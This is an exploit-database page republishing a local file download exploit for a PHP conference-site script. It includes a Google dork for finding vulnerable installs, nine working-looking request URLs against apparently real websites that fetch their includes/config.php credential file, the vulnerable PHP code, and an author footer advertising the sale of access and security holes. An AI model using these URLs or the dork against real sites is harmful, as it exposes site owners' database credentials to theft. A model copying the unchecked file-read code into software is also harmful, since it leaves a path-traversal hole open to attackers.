Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020020071

Below is a copy:

Innovinc International Script Local File Download Vulnerability
/***********************************************************************************
** Exploit Title:   Innovinc International  Script Local File Download Vulnerability
**
** Exploit Author:  Milad Hacking
**
** Vendor Homepage : https://innovinc.org/
**
** Version : 1.1
**
** Google Dork : inurl:/importantdates intext:"Innovinc International"
**
** Date: 2020-02-13
**
** Tested on:  Kali Linux  /  lceweasel
**
***********************************************************************************
** Demo :

https://wns2020.org/download.php?file=includes/config.php

https://www.ifhn-2020.org/download.php?file=includes/config.php

https://www.wccrt.com/download.php?file=includes/config.php

https://www.idf-2020.org/download.php?file=includes/config.php

https://alzheimers-dementia.org/download.php?file=includes/config.php

https://geology-earthscience.com/download.php?file=includes/config.php

https://2020cce.com/download.php?file=includes/config.php

https://arc-2020.org/download.php?file=includes/config.php

https://icmsn2020.com/download.php?file=includes/config.php

***********************************************************************************
***********************************************************************************
** Vulnerability code :

<?php
$file = $_GET['file'];
if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename='.$_GET['newFile']);
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
    exit;
}
?>

***********************************************************************************
** Special thanks to:  iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Babak Kh4t4R
Mahdi CocAin - Mohammad Samiyi <3
***********************************************************************************
Sell Access And Security Holes
https://fullsec.org
https://telegram.me/Milad_Hacking
Https://telegram.me/TheHackings
http://instagram.com/Milad.Hacking
[email protected]

***********************************************************************************

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.